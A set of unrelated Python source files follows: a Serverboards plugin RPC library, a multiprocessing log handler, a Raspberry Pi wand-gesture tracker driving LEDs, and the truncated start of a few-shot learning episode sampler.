self.add_event(self.__event_signal_r, self.__received_event)
self.set_stdin(stdin)
def __received_event(self):
"""
Read an event at __event_signal_r, and mark it as received.
"""
event_idb = self.__event_signal_r.read(4)
event_id = int.from_bytes(event_idb, "big")
del self.__events[event_id]
def __call_local(self, rpc):
"""
Performs a local call into a registered method.
This is use internally for all incomming rpc calls.
"""
method = rpc['method']
params = rpc['params'] or []
call_id = rpc.get('id')
(args, kwargs) = ([], params) if type(params) == dict else (params, {})
if method in self.__rpc_registry:
f = self.__rpc_registry[method]
try:
# print(method, params, args, kwargs)
res = f(*args, **kwargs)
return {
'result': res,
'id': call_id
}
except Exception as e:
log_traceback()
return {
'error': str(e),
'id': call_id
}
if not call_id:
self.__emit_event(method, *args, **kwargs)
else:
return {'error': 'unknown_method %s' % method, 'id': call_id}
def __emit_event(self, method, *args, **kwargs):
"""
Emits the event to the subscription watchers.
It takes care of not doing reentries, at it leads to bugs, as
for example processing data from one event, do some remote call,
another event arrives, and finished before the first.
This is a real case of race condition writing to a file.
The code here avoids the situation making events not reentrable; if
processing an event, it queues newer to be delivered later.
"""
do_later = len(self.__pending_events_queue) > 0
self.__pending_events_queue.append((method, args, kwargs))
if do_later:
debug("No emit %s yet, as processing something else" % method)
return
# debug("Check subscriptions %s in %s"%(method,
# repr(self.__subscriptions.keys())))
# do all the items on the queue
while len(self.__pending_events_queue) > 0:
(method, args, kwargs) = self.__pending_events_queue[0]
if method in self.__subscriptions:
for f in self.__subscriptions[method]:
if f:
try:
# debug("Calling %s b/o event %s(%s)" %
# (f, method, args or kwargs))
f(*args, **kwargs)
except Exception:
log_traceback()
# pop from top
self.__pending_events_queue = self.__pending_events_queue[1:]
def __loop(self):
"""
Ener into the read remote loop.
This loop also perform the timers watch and extra fds select.
"""
prev_status = self.__loop_status
self.__loop_status = 'IN'
# pending requests
while self.__requestq:
rpc = self.__requestq[0]
self.__requestq = self.__requestq[1:]
self.__process_line(rpc)
# incoming
while self.__loop_status == 'IN':
# debug("Wait fds: %s" %
# ([x.fileno() for x in self.__fdevents.keys()]))
self.__loop_one()
self.__loop_status = prev_status
def __loop_one(self):
# Call pending call_soon, in FIFO mode. New may appear while
# processing this, and its ok
while self.__call_soon:
cb = self.__call_soon[0]
try:
cb()
except Exception:
log_traceback()
self.__call_soon = self.__call_soon[1:]
if self.__timers:
timer = min(self.__timers.values(), key=lambda x: x.next)
next_timeout = timer.next - time.time()
else:
timer = None
next_timeout = None
# debug("Next timeout", next_timeout, timeout_id)
# print("Wait for ", self.__fdevents.keys(),
# next_timeout, file=stderr)
if not next_timeout or next_timeout >= 0:
res = select.select(self.__fdevents.keys(), [], [], next_timeout)
read_ready = res[0]
else: # maybe timeout already expired
read_ready = []
# print("Select finished: ", res, next_timeout, file=stderr)
if read_ready:
for ready in read_ready:
try:
self.__fdevents[ready]()
except Exception:
log_traceback()
elif timer: # timeout
if timer.rearm:
timer.arm()
else:
del self.__timers[timer.id]
# rearm ?? Docs says no rearming
try:
timer.cont()
except Exception:
log_traceback()
def __loop_until(self, id=None, event=None, method=None):
"""
Performs an inner loop to be done while calling into the server.
It is as the other loop, but until it get the proper reply.
Requires the id of the reply to wait for, and the name of the method
for error reporting.
"""
# mini loop, may request calls while here
while self.__loop_status != "EXIT":
# if waiting for event, and event is no more, return
# print("Wait for events ", self.__events, file=stderr)
# I wait for an event, and its not there, then it has happened
if event and not self.__events.get(event):
# print("Return from event ", event, file=stderr)
return
rpc = self.__replyq.get(id)
if rpc:
del self.__replyq[id]
if 'result' in rpc:
return rpc['result']
else:
if rpc["error"] == "unknown_method":
raise Exception("unknown_method %s" % method)
raise Exception(rpc["error"])
# this is last, so that if conditions are fulfilled at start, just
# return
self.__loop_one()
def __read_parse_line(self):
"""
Reads a line from the rpc input line, and parses it.
"""
line = self.__stdin.readline()
if self.__debug:
print("%s<< %s" % (plugin_id, line), file=stderr, end='\r\n')
if not line:
self.stop()
return
rpc = json.loads(line)
self.__process_line(rpc)
def __process_line(self, rpc):
"""
Performs the request processing to the external RPC endpoint.
This internal function is used to do the real writing to the
other end, as in some conditions it may be delayed.
"""
if "result" in rpc or "error" in rpc:
return self.__process_result(rpc)
if "method" in rpc:
return self.__process_call(rpc)
raise Exception("unknown line type: %s" % (rpc.keys(),))
def __process_result(self, rpc):
id = rpc.get("id")
# Might be an asynchronous result or error
async_cb = self.__async_cb.get(id)
if async_cb:
# User can set only success condition, or a tuple with both
error_cb = None
if type(async_cb) == tuple:
async_cb, error_cb = async_cb
try: # try to call the error or result handlers
if async_cb and 'result' in rpc:
async_cb(rpc.get("result"))
elif error_cb and 'error' in rpc:
error_cb(rpc.get("error"))
except Exception:
log_traceback()
del self.__async_cb[id]
# Or just an answer
else:
# keep it in the response store, later will check if ready
self.__replyq[id] = rpc
def __process_call(self, rpc):
# If not ready yet to process requests, queue it for later.
if self.__loop_status != 'IN':
self.__requestq.append(rpc)
return
self.__last_rpc_id = rpc.get("id")
res = self.__call_local(rpc)
# subscription do not give back response
if not res:
return
# might be already answered via `reply`
if res.get("id") in self.__manual_replies:
self.__manual_replies.discard(res.get("id"))
return
# normal case
try:
self.__println(json.dumps(res))
except Exception:
log_traceback()
self.__println(json.dumps({
"error": "serializing json response",
"id": res["id"]
}))
def __println(self, line):
"""
Prints a line onto the external endpoint.
This function allows for easy debugging and some error conditions.
"""
try:
if self.__debug:
print("%s>> %s" % (plugin_id, line), file=stderr, end='\r\n')
self.stdout.write(line + '\n')
self.stdout.flush()
except IOError:
if self.__loop_status == 'EXIT':
sys.exit(1)
self.stop()
def add_method(self, name, f):
"""
Adds a method to the local method registry.
All local methods that can be caled b the remote endpoint have to be
registered here.
Normally the `@rpc_method` decorator is used for ease of use.
"""
self.__rpc_registry[name] = f
def loop(self):
"""
Starts the remote reading mode.
This loops indefinetely until stop_loop is called.
"""
self.__loop()
def loop_until(self, id=None, event=None):
return self.__loop_until(id, event)
def stop(self):
"""
Forces loop stop on next iteration.
This can be used to force program stop, although normally
serverboards will emit a SIGSTOP signal to stop processes when
required.
"""
self.__loop_status = 'EXIT'
debug("--- EOF ---")
def set_debug(self, debug=True):
"""
Enabled debug mode, shows all communications
"""
self.__debug = debug
print("DEBUG MODE ON", file=stderr, end='\r\n')
def set_stdin(self, stdin):
"""
Replaces current stdin for RPC
Can be used for testing.
"""
if stdin == sys.stdin:
stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
if self.__stdin:
self.remove_event(self.__stdin)
# Can not set a stdin, in which case, the loop becomes infinite until
# stop
if stdin is not None:
self.add_event(stdin, self.__read_parse_line)
self.__stdin = stdin
def add_event(self, fd, cont):
"""
Watches for changes in a external file descriptor and calls the
continuation function.
This allows this class to also listen for external processes and file
description changes.
# Parameters
param | type | description
------|------------|------------
fd | int | File descriptor
cont | function() | Continuation function to call when new data ready
"""
if fd not in self.__fdevents:
self.__fdevents[fd] = cont
def remove_event(self, fd):
"""
Removes an event from the event watching list
"""
if fd in self.__fdevents:
del self.__fdevents[fd]
return True
return False
class Timer:
"""
Data about timers
"""
def __init__(self, id, interval, cont, rearm):
self.next = None
self.id = id
self.interval = interval
self.cont = cont
self.rearm = rearm
self.arm()
def arm(self):
self.next = time.time() + self.interval
return self
def add_timer(self, interval, cont, rearm=False):
"""
Adds a timer to the rpc object
After the given interval the continuation object will be called.
The timer is not rearmed; it must be added again by the caller if
desired.
This timers are not in realtime, and may be called well after the
timer expires, if the process is performing other actions, but will be
called as soon as possible.
# Parameters
param | type | description
------|------------|------------
interval | float | Time in seconds to wait until calling this timer
cont | function() | Function to call when the timer expires.
rearm | bool | Whether this timer automatically rearms. [false]
# Returns
timer_id : int
Timer id to be used for later removal of timer
"""
assert interval and cont, "Required interval and continuation"
tid = self.__timer_id
self.__timers[tid] = RPC.Timer(tid, interval, cont, rearm)
self.__timer_id += 1
return tid
def remove_timer(self, tid):
"""
Removes a timer.
"""
if tid in self.__timers:
del self.__timers[tid]
def event(self, method, *params, **kparams):
"""
Sends an event to the other side
"""
rpcd = dict(method=method, params=params or kparams)
try:
rpc = json.dumps(rpcd)
self.__println(rpc)
except TypeError:
error("Invalid JSON data: ", repr(rpcd))
def reply(self, result):
"""
Shortcuts request processing returning an inmediate answer. The final
answer will be ignored.
This allows to start long running processes that may send events in a
loop.
If more calls are expected, it is recomended to spawn new threads.
"""
self.__manual_replies.add(self.__last_rpc_id)
self.__println(json.dumps({
"id": self.__last_rpc_id,
"result": result
}))
def call(self, method, *params, _async=False, **kwparams):
"""
Calls a method on the other side and waits until answer.
If receives a call while waiting for answer there are two behaviours:
1. If at self.loop, processes the request inmediatly
2. If not, queues it to be processed wehn loop is called
This allows to setup the environment.
Optional arguments:
* _async -- Set to a callback to be called when the answer is
received. Makes the call asynchronous. callback receives
the answer. It is called with response None in case of
error.
"""
id = self.__send_id
self.__send_id += 1
# if both, pass kwparams as last argument. This sensible default works
# with for example action calling and passing more calls to plugins
if params and kwparams:
params = [*params, kwparams]
rpc = json.dumps(dict(method=method, params=params or kwparams, id=id))
self.__println(rpc)
if _async: # Will get answer later calling the _async callback
self.__async_cb[id] = _async
return
return self.__loop_until(id, method=method)
def subscribe(self, event, callback):
"""
Subscribes for a serverevent, calling the callback(eventdata) when it
happens.
Returns a subscription id, tahta can be used to unsubscribe.
"""
# maybe event[context], we keep only event as only events are sent.
eventname = event.split('[', 1)[0]
sid = self.__subscription_id
events = self.__subscriptions.get(eventname, []) + [callback]
self.__subscriptions[eventname] = events
self.__subscriptions_ids[sid] = (eventname, callback)
self.call("event.subscribe", event)
self.__subscription_id += 1
# debug("Subscribed to %s" % event)
# debug("Added subscription %s id %s: %s"%(eventname, sid,
# repr(self.__subscriptions[eventname])))
return sid
def unsubscribe(self, subscription_id):
"""
Unsubscribes from an event.
"""
if subscription_id in self.__subscriptions:
debug("%s in %s" %
(subscription_id, repr(self.__subscriptions_ids))
)
(event, callback) = self.__subscriptions_ids[subscription_id]
self.__subscriptions[event] = [
x for x in self.__subscriptions[event] if x != callback
]
# debug("Removed subscription %s id %s" % (event, subscription_id))
self.call("event.unsubscribe", event)
del self.__subscriptions_ids[subscription_id]
def thread_run(self, cmd, *args, **kwargs):
"""
Runs a function in another thread, and on completion returns, but
keeping the loop running.
This efectively means that the other function is not blocking the
event loop.
"""
id = self.__event_id
self.__event_id += 1
def run():
result = cmd(*args, **kwargs)
self.__event_results[id] = result
self.__event_signal_w.write(id.to_bytes(4, "big"))
self.__event_signal_w.flush()
thread = threading.Thread(target=run)
thread.start()
self.__events[id] = thread.join
# "context" switch
rpc.loop_until(event=id)
res = self.__event_results[id]
del self.__event_results[id]
return res
def call_soon(self, callback):
"""
Call ASAP the given callback, inside the loop
"""
self.__call_soon.append(callback)
def status(self):
"""
Returns current loop status
"""
return self.__loop_status
def method_list(self):
"""
Returns the list of known methods, for `dir` pourposes
"""
return self.__rpc_registry.keys()
# RPC singleton
rpc = RPC(sys.stdin, sys.stdout)
sys.stdout = stderr # allow debugging by print
def rpc_method(f):
"""
Decorator to add this method to the known RPC methods.
Use as simple decorator:
```python
@decorator
def func(param1, param2):
....
```
or with a specific name
```python
@decorator("rpc-name")
def func(param1=None):
...
```
"""
if type(f) == str:
method_name = f
def regf(f):
# print("Registry %s: %s"%(method_name, repr(f)))
rpc.add_method(method_name, f)
return f
return regf
else:
# print("Registry %s"%(f.__name__))
rpc.add_method(f.__name__, f)
return f
@rpc_method("dir")
def __dir():
"""
Returns the list of all registered methods.
Normally used by the other endpoint.
"""
return list(rpc.method_list())
def loop():
"""
Wrapper to easily start rpc loop
Can replace the stdin and stdout here. Use only for debug. This change is
permanent.
Normal stdin may not be UTF8. To force do:
```
stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
```
"""
rpc.loop()
class WriteTo:
def __init__(self, fn, **extra):
self.fn = fn
self.extra = extra
def __call__(self, *args, **extra):
nextra = {**{"level": 1}, **self.extra, **extra}
if not args: # if no data, add extras for contexts.
return WriteTo(self.fn, **nextra)
self.fn(*args, **nextra)
def write(self, data, *args, **extra):
if data.endswith('\n'):
data = data[:-1]
self.fn(data, *args, **{**{"level": 1}, **self.extra, **extra})
def flush(*args, **kwargs):
pass
@contextmanager
def context(self, level=2, **extra):
value = io.StringIO()
yield value
value.seek(0)
self.fn(value.read(), **{**{"level": level}, **self.extra, **extra})
def log_(rpc, type):
def decorate_log(extra, level=2):
"""
Helper that decorates the given log messages with data of which
function, line and file calls the log.
"""
import inspect
callerf = inspect.stack()[level]
caller = {
"plugin_id": plugin_id,
"function": callerf[3],
"file": callerf[1],
"line": callerf[2],
"pid": os.getpid(),
}
caller.update(extra)
return caller
log_method = "log.%s" % type
def log_inner(*msg, level=0, file=None, **extra):
msg = ' '.join(str(x) for x in msg)
if file is not None:
file.write(msg + "\n")
if not msg:
return
return rpc.event(
log_method,
str(msg),
decorate_log(extra, level=level + 2)
)
return log_inner
error = WriteTo(log_(rpc, "error"))
debug = WriteTo(log_(rpc, "debug"))
info = WriteTo(log_(rpc, "info"))
warning = WriteTo(log_(rpc, "warning"))
real_print = print
def print(*args, file=None, **kwargs):
"""
Wraps around real print to allow to just print to the
log.
If has the file= kwarg, uses the normal print.
"""
if file is None:
debug(*args, **kwargs)
else:
real_print(*args, file=file, **kwargs)
def log_traceback():
"""
Logs teh given traceback to the error log.
"""
import traceback
traceback.print_exc(file=error)
def __simple_hash__(*args, **kwargs):
hs = ";".join(str(x) for x in args)
hs += ";"
hs += ";".join(
"%s=%s" % (
__simple_hash__(k),
__simple_hash__(kwargs[k])
) for k in sorted(kwargs.keys()))
return hash(hs)
def cache_ttl(ttl=10, maxsize=50, hashf=__simple_hash__):
"""
Simple decorator, not very efficient, for a time based cache.
Params:
ttl -- seconds this entry may live. After this time, next use is
evicted.
maxsize -- If trying to add more than maxsize elements, older will be
evicted.
hashf -- Hash function for the arguments. Defaults to same data as
keys, but may require customization.
"""
def wrapper(f):
data = {}
def wrapped(*args, **kwargs):
nonlocal data
currentt = time.time()
if len(data) >= maxsize:
# first take out all expired
data = {
k: (timeout, v)
for k, (timeout, v) in data.items()
if timeout > currentt
}
if len(data) >= maxsize:
# not enough, expire oldest
oldest_k = None
oldest_t = currentt + ttl
for k, (timeout, v) in data.items():
if timeout < oldest_t:
oldest_k = k
oldest_t = timeout
del data[oldest_k]
assert len(data) < maxsize
if not args and not kwargs:
hs = None
else:
hs = hashf(*args, **kwargs)
timeout, value = data.get(hs, (currentt, None))
if timeout <= currentt or not value:
# recalculate
value = f(*args, **kwargs)
# store
data[hs] = (currentt + ttl, value)
return value
def invalidate_cache():
nonlocal data
data = {}
wrapped.invalidate_cache = invalidate_cache
return wrapped
return wrapper
class Config:
"""
Easy access some configuration data for this plugin
"""
def __init__(self):
self.path = os.path.expanduser(
os.environ.get('SERVERBOARDS_PATH', '~/.local/serverboards/')
)
Config.__ensure_path_exists(self.path)
def file(self, filename):
"""
Gets the absolute path of a local file for this plugin.
This uses the serverboards configured local storage for the current
plugin
"""
p = os.path.join(self.path, filename)
if not p.startswith(self.path):
raise Exception("Trying to escape from config directory.")
Config.__ensure_path_exists(os.path.dirname(p))
return p
@staticmethod
def __ensure_path_exists(path):
try:
os.makedirs(path, 0o0700)
except OSError as e:
if 'File exists' not in str(e):
raise
# config singleton
config = Config()
class Plugin:
"""
Wraps a plugin to easily call the methods in it.
It has no recovery in it.
Can specify to ensure it is dead (kill_and_restart=True) before use. This
is only useful at tests.
"""
class Method:
def __init__(self, plugin, method):
self.plugin = plugin
self.method = method
def __call__(self, *args, **kwargs):
return self.plugin.call(self.method, *args, **kwargs)
def __init__(self, plugin_id, kill_and_restart=False, restart=True):
self.plugin_id = plugin_id
if kill_and_restart:
try:
rpc.call("plugin.kill", plugin_id)
time.sleep(1)
except Exception:
pass
self.restart = restart
self.start()
def __getattr__(self, method):
if not self.uuid:
self.uuid = rpc.call("plugin.start", self.plugin_id)
return Plugin.Method(self, method)
def start(self):
self.uuid = rpc.call("plugin.start", self.plugin_id)
return self
def stop(self):
"""
Stops the plugin.
"""
if not self.uuid: # not running
return self
rpc.call("plugin.stop", self.uuid)
self.uuid = None
return self
RETRY_EVENTS = ["exit", "unknown_plugin at plugin.call", "unknown_plugin"]
def call(self, method, *args, _async=False, **kwargs):
"""
Call a method by name.
This is also a workaround calling methods called `call` and `stop`.
"""
try:
return rpc.call(
"plugin.call",
self.uuid,
method,
args or kwargs,
_async=_async
)
except Exception as e:
# if exited or plugin call returns unknown method (refered to the
# method to call at the plugin), restart and try again.
if (str(e) in Plugin.RETRY_EVENTS) and self.restart:
# if error because exitted, and may restart,
# restart and try again (no loop)
debug("Restarting plugin", self.plugin_id)
self.start()
return rpc.call(
"plugin.call",
self.uuid,
method,
args or kwargs
)
else:
raise
def __enter__(self):
return self
def __exit__(self, _type, _value, _traceback):
try:
self.stop()
except Exception as ex:
if str(ex) != "cant_stop at plugin.stop":
raise
class SH:
"""
Wrapper around `sh` that integrates into the serverboards loop.
This allows to call external long running or even blocking programs
and keep receiving requests.
Special care must be taken as it may introduce subtle bugs when using
global state, as this has no synchronization mechanisms and the same
function may be called twice (by remote end).
Not all functionalities of `sh` are included, only most common ones.
"""
def __init__(self):
pass
def __getattr__(self, cmd):
return self.Command(cmd)
def Command(self, cmd):
def caller(*args, **kwargs):
# print("Call %s(%s,%s)" % (cmd, args, kwargs), file=stderr)
def run():
return real_sh.Command(cmd)(*args, **kwargs)
response = rpc.thread_run(run)
# print("SH / %s: %s" % (cmd, repr(response)), file=stderr)
return response
return caller
# An sh-like wrapper to have it integrated into serverboards.
sh = SH()
class RPCWrapper:
"""
Wraps any module or function to be able to be called.
This allows to do a simple `service.get(uuid)`, given that before you did a
`service = RPCWrapper("service")`.
There are already some instances ready for importing as:
`from serverboards import service, issues, rules, action`
"""
def __init__(self, module):
self.module = module
def __getattr__(self, sub):
return RPCWrapper(self.module + '.' + sub)
def __call__(self, *args, **kwargs):
if args and kwargs:
return rpc.call(self.module, *args, kwargs)
return rpc.call(self.module, *args, **kwargs)
action = RPCWrapper("action")
auth = RPCWrapper("auth")
group = RPCWrapper("group")
perm = RPCWrapper("perm")
user = RPCWrapper("user")
dashboard = RPCWrapper("dashboard")
event = RPCWrapper("event")
issues = RPCWrapper("issues")
logs = RPCWrapper("logs")
notifications = RPCWrapper("notifications")
plugin = RPCWrapper("plugin")
plugin.component = RPCWrapper("plugin.component")
project = RPCWrapper("project")
rules = RPCWrapper("rules")
rules_v2 = RPCWrapper("rules_v2")
service = RPCWrapper("service")
settings = RPCWrapper("settings")
file = RPCWrapper("file")
|
multiprocessing_log.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Multiprocessing log rotating file handler
# https://mattgathu.github.io/multiprocessing-logging-in-python/
# https://gist.github.com/JesseBuesking/10674086
from logging.handlers import RotatingFileHandler
import multiprocessing
import threading
import logging
import sys
import traceback
class MultiProcessingLog(logging.Handler):
def __init__(self, name, mode, maxsize, rotate):
logging.Handler.__init__(self)
self._handler = RotatingFileHandler(name, mode, maxsize, rotate)
self.queue = multiprocessing.Queue(-1)
t = threading.Thread(target=self.receive)
t.daemon = True
t.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
# print('received on pid {}'.format(os.getpid()))
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except BaseException:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
# ensure that exc_info and args have been stringified. Removes any
# chance of unpickleable things inside and possibly reduces message
# size sent over the pipe
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except BaseException:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
|
trained.py
|
#/usr/bin/python
# -*- coding: utf-8 -*-
import io
import numpy as np
import argparse
import cv2
from cv2 import *
import picamera
import threading
from threading import Thread
from os import listdir
from os.path import isfile, join, isdir
import sys
import math
import time
import imutils
from imutils.video.pivideostream import PiVideoStream
#######################
# LED light definitions
#######################
from neopixel import *
#from rpi_ws281x.rpi_ws281x import ws
import argparse
# LED strip configuration:
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# LED colors
#Movement: M
#Color: 333a56
m_movement = Color(51, 58, 86)
#Movement: W
#Color: 1b7b34
w_movement = Color(27, 123, 52)
#Movement: L
#Color: e37222
l_movement = Color(227, 114, 34)
#Movement: upside down L
#Color: e52a5f
upside_down_l_movement = Color(229, 42, 95)
#Movement: O
#Color: f7b733
o_movement = Color(247, 183, 51)
#Movement: +
#Color: a239ca
plus_movement = Color(162, 57, 202)
#Movement: S
#Color: 4717f6
s_movement = Color(71, 23, 246)
#Movement: Z
#Color: d7dd35
z_movement = Color(215, 221, 53)
# Create NeoPixel object with appropriate configuration.
global strip
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
# Intialize the library (must be called once before other functions).
strip.begin()
print "Initializing point tracking"
parser = argparse.ArgumentParser(description='Cast some spells! Recognize wand motions')
parser.add_argument('--train', help='Causes wand movement images to be stored for training selection.', action="store_true")
parser.add_argument('--circles', help='Use circles to select wand location', action="store_true")
args = parser.parse_args()
print(args.train)
print(args.circles)
# Parameters
lk_params = dict( winSize = (25,25),
maxLevel = 7,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
blur_params = (4,4)
dilation_params = (5, 5)
movment_threshold = 80
active = False
# start capturing
vs = PiVideoStream().start()
time.sleep(2.0)
run_request = True
frame_holder = vs.read()
frame = None
print "About to start."
knn = None
nameLookup = {}
def TrainOcr() :
global knn, nameLookup
labelNames = []
labelIndexes = []
trainingSet = []
numPics = 0
dirCount = 0
mypath = "./Pictures/"
for d in listdir(mypath):
if isdir(join(mypath, d)):
nameLookup[dirCount] = d
dirCount = dirCount + 1
for f in listdir(join(mypath,d)):
if isfile(join(mypath,d,f)):
labelNames.append(d)
labelIndexes.append(dirCount-1)
trainingSet.append(join(mypath,d,f));
numPics = numPics + 1
print "Training set..."
print trainingSet
print "Labels..."
print labelNames
print "Indexes..."
print labelIndexes
print "Lookup..."
print nameLookup
samples = []
for i in range(0, numPics):
img = cv2.imread(trainingSet[i])
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
samples.append(gray);
npArray = np.array(samples)
shapedArray = npArray.reshape(-1,400).astype(np.float32);
# Initiate kNN, train the data, then test it with test data for k=1
knn = cv2.ml.KNearest_create()
knn.train(shapedArray, cv2.ml.ROW_SAMPLE, np.array(labelIndexes))
lastTrainer = None
def CheckOcr(img):
global knn, nameLookup, args, lastTrainer
size = (20,20)
test_gray = cv2.resize(img,size,interpolation=cv2.INTER_LINEAR)
if args.train and img != lastTrainer:
cv2.imwrite("Pictures/char" + str(time.time()) + ".png", test_gray)
lastTrainer = img
imgArr = np.array(test_gray).astype(np.float32)
sample = imgArr.reshape(-1,400).astype(np.float32)
ret,result,neighbours,dist = knn.findNearest(sample,k=5)
print ret, result, neighbours, dist
if nameLookup[ret] is not None:
print "Match: " + nameLookup[ret]
return nameLookup[ret]
else:
return "error"
def FrameReader():
global frame_holder
t = threading.currentThread()
while getattr(t, "do_run", True):
frame = vs.read()
frame = imutils.resize(frame, width=400)
cv2.flip(frame,1,frame)
frame_holder = frame
time.sleep(.03)
def change_color(strip, color):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
def Spell(spell):
#Invoke IoT (or any other) actions here
global strip
return
if (spell=="center"):
print "trinket_pin trigger"
elif (spell=="circle"):
print "switch_pin OFF"
print "nox_pin OFF"
print "incendio_pin ON"
change_color(strip, o_movement)
elif (spell=="eight"):
print "switch_pin ON"
print "nox_pin OFF"
print "incendio_pin OFF"
elif (spell=="left"):
print "switch_pin OFF"
print "nox_pin ON"
print "incendio_pin OFF"
elif (spell=="square"):
None
elif (spell=="swish"):
None
elif (spell=="tee"):
None
elif (spell=="triangle"):
None
elif (spell=="zee"):
None
print "CAST: %s" %spell
def GetPoints(image):
if args.circles is not True:
p0 = cv2.goodFeaturesToTrack(image, 5, .01, 30)
else:
p0 = cv2.HoughCircles(image,cv2.HOUGH_GRADIENT,3,50,param1=240,param2=8,minRadius=2,maxRadius=10)
if p0 is not None:
p0.shape = (p0.shape[1], 1, p0.shape[2])
p0 = p0[:,:,0:2]
return p0;
def ProcessImage():
global frame_holder
frame = frame_holder.copy()
frame_gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
th, frame_gray = cv2.threshold(frame_gray, 230, 255, cv2.THRESH_BINARY);
return frame_gray, frame
def FindWand():
global old_frame,old_gray,p0,mask, line_mask, run_request
try:
last = time.time()
t = threading.currentThread()
while getattr(t, "do_run", True):
now = time.time()
if run_request:
old_gray, old_frame = ProcessImage()
p0 = GetPoints(old_gray)
if p0 is not None:
mask = np.zeros_like(old_frame)
line_mask = np.zeros_like(old_gray)
run_request = False
last = time.time()
time.sleep(.3)
except cv2.error as e:
None
except:
e = sys.exc_info()[1]
#print "Error: %s" % e
def TrackWand():
global old_frame,old_gray,p0,mask, line_mask, color, frame, active, run_request
print "Starting wand tracking..."
color = (0,0,255)
# Create a mask image for drawing purposes
noPt = 0
while True:
try:
active = False
if p0 is not None:
active = True;
frame_gray, frame = ProcessImage();
cv2.imshow("Original", frame_gray)
# calculate optical flow
newPoints = False
if p0 is not None and len(p0) > 0:
noPt = 0
try:
if old_gray is not None and frame_gray is not None:
p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)
newPoints = True
except cv2.error as e:
None
except:
print "."
continue
else:
noPt = noPt + 1
if noPt > 10:
try:
im2, contours,hierarchy = cv2.findContours(line_mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[0]
x,y,w,h = cv2.boundingRect(cnt)
crop = line_mask[y-10:y+h+10,x-30:x+w+30]
result = CheckOcr(crop);
cv2.putText(line_mask, result, (0,50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255,255,255))
Spell(result)
if line_mask:
cv2.imshow("Raspberry Potter", line_mask)
line_mask = np.zeros_like(line_mask)
print ""
finally:
noPt = 0
run_request = True
if newPoints:
# Select good points
good_new = p1[st==1]
good_old = p0[st==1]
# draw the tracks
for i,(new,old) in enumerate(zip(good_new,good_old)):
a,b = new.ravel()
c,d = old.ravel()
cv2.line(line_mask, (a,b),(c,d),(255,255,255), 10)
if line_mask is not None:
cv2.imshow("Raspberry Potter", line_mask)
else:
if frame is not None:
cv2.imshow("Original", frame)
run_request = True
time.sleep(.3)
# Now update the previous frame and previous points
old_gray = frame_gray.copy()
p0 = good_new.reshape(-1,1,2)
except IndexError:
run_request = True
except cv2.error as e:
None
#print sys.exc_info()
except TypeError as e:
None
print "Type error."
exc_type, exc_obj, exc_tb = sys.exc_info()
print(exc_type, exc_tb.tb_lineno)
except KeyboardInterrupt as e:
raise e
except:
None
#print sys.exc_info()
#print "Tracking Error: %s" % e
key = cv2.waitKey(10)
if key in [27, ord('Q'), ord('q')]: # exit on ESC
cv2.destroyAllWindows()
break
try:
TrainOcr()
t = Thread(target=FrameReader)
t.do_run = True
t.start()
find = Thread(target=FindWand)
find.do_run = True
find.start()
print "START incendio_pin ON and set switch off if video is running"
time.sleep(2)
TrackWand()
except KeyboardInterrupt:
print("Shutting down...")
finally:
t.do_run = False
find.do_run = False
t.join()
find.join()
cv2.destroyAllWindows()
vs.stop()
sys.exit(1)
|
parallel_sampler.py
|
import time
import datetime
from multiprocessing import Process, Queue, cpu_count
import torch
import numpy as np
# from pytorch_transformers import BertModel
from transformers import BertModel
import dataset.utils as utils
import dataset.stats as stats
class ParallelSampler():
def __init__(self, data, args, num_episodes=None, train=False):
self.data = data
self.args = args
self.num_episodes = num_episodes
# So I can change without changing args
self.shot = self.args.shot
self.way = self.args.way
self.all_classes = np.unique(self.data['label'])
self.num_classes = len(self.all_classes)
if self.num_classes < self.args.way:
raise ValueError("Total number of classes is less than #way.")
self.idx_list = []
for y in self.all_classes:
self.idx_list.append(
np.squeeze(np.argwhere(self.data['label'] == y)))
self.count = 0
self.done_queue = Queue()
self.num_cores = cpu_count() if args.n_workers is 0 else args.n_workers
self.p_list = []
for i in range(self.num_cores):
self.p_list.append(
Process(target=self.worker, args=(self.done_queue,)))
for i in range(self.num_cores):
self.p_list[i].start()
# This and next for GCML
def change_shots(self, new_shots):
print(f"Changed shots from {self.shot} to {new_shots}")
self.shot = new_shots
def change_ways(self, new_ways):
print(f"Change ways from {self.way} to {new_ways}")
self.way = new_ways
def get_epoch(self):
for _ in range(self.num_episodes):
# wait until self.thread finishes
support, query = self.done_queue.get()
# convert to torch.tensor
support = utils.to_tensor(support, self.args.cuda, ['raw'])
query = utils.to_tensor(query, self.args.cuda, ['raw'])
if self.args.meta_w_target:
if self.args.meta_target_entropy:
w = stats.get_w_target(
support, self.data['vocab_size'],
self.data['avg_ebd'], self.args.meta_w_target_lam)
